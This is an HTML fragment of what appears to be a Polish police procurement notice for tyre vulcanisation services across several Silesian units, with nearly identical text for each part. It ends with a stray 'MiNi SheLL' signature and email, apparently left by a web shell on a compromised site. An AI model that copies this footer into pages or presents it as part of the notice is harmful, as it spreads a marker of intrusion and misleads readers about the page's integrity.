<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Rybnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Siemianowice Śląskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP KPP Tarnowskie Góry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KPP Wodzisław Śląski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KPP Zawiercie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KPP Żywiec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Gliwice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Piekary Śląskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Świadczenie usługi wulkanizacji opon w pojazdach służbowych dla KMP Dąbrowa Górnicza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, w tym pojazdów osobowych i typu furgon, będących na stanie jednostek Policji garnizonu śląskiego. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne. Ilość pojazdów w trakcie trwania umowy może ulec zmianie. Wykonawca musi posiadać punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia w odległości nie przekraczającej 10 km licząc po trasie od siedziby danej jednostki Policji (wykaz jednostek wraz z adresami stanowi załącznik nr 3 do SIWZ). Punkt ten musi być czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Wykonawca winien posiadać prawo własności lub inny tytuł prawny bądź przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego rozumianego jako dysponowanie punktem usługowym spełniającym w/w wymogi.
Rozliczanie następować będzie na podstawie faktycznie zrealizowanych świadczeń według cen jednostkowych obliczonych zgodnie z załącznikiem nr 1 do SIWZ do wyczerpania całkowitej wartości zamówienia jaką Zamawiający przeznaczył na sfinansowanie zamówienia podaną na otwarciu ofert.
Zamawiający dopuszcza podwykonawców.
3. W przypadku wykonywania zamówienia z udziałem podwykonawców, Wykonawca zobowiązany jest złożyć oświadczenie na formularzu ofertowym  wskazując jakie części zamówienia zostaną przekazane do wykonania podwykonawcom. W przypadku niezłożenia oświadczenia Zamawiający uzna, że Wykonawca wykona zamówienia bez udziału podwykonawców.  
4. W przypadku wykonawców ubiegających się wspólnie (np. konsorcjum) o udzielenie zamówienia publicznego niezbędnym jest wskazanie w umowie konsorcjum, zakres przedmiotu zamówienia (rzeczowy) jaki będzie realizował każdy z uczestników konsorcjum. 
UWAGA:  maksymalna wartość umowy będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com